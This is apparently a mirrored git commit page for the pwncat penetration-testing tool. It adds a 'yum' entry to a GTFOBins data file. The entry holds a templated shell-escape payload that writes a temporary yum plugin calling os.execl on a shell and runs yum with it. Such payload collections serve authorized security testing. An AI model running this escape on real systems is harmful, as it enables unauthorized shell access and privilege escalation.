mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Moved gtfobins.json to the right location.
This commit is contained in:
parent
140bf19935
commit
b46ec274a2
2137
data/gtfobins.json
2137
data/gtfobins.json
File diff suppressed because it is too large
Load Diff
@ -2095,8 +2095,13 @@
|
|||||||
}
|
}
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
// `yum` should be added.
|
"yum": [
|
||||||
// https://gtfobins.github.io/gtfobins/yum/
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TF=$({mktemp} -d); {cat} >$TF/x<<EOF\n[main]\nplugins=1\npluginpath=$TF\npluginconfpath=$TF\nEOF\n\n{cat} >$TF/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\n{cat} >$TF/y.py<<EOF\nimport os\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n os.execl('{shell}','{shell}')\nEOF\n\n{command} -c $TF/x --enableplugin=y",
|
||||||
|
"args": []
|
||||||
|
}
|
||||||
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
"zip": [
|
"zip": [
|
||||||
{
|
{
|
||||||
|
Loading…
Reference in New Issue
Block a user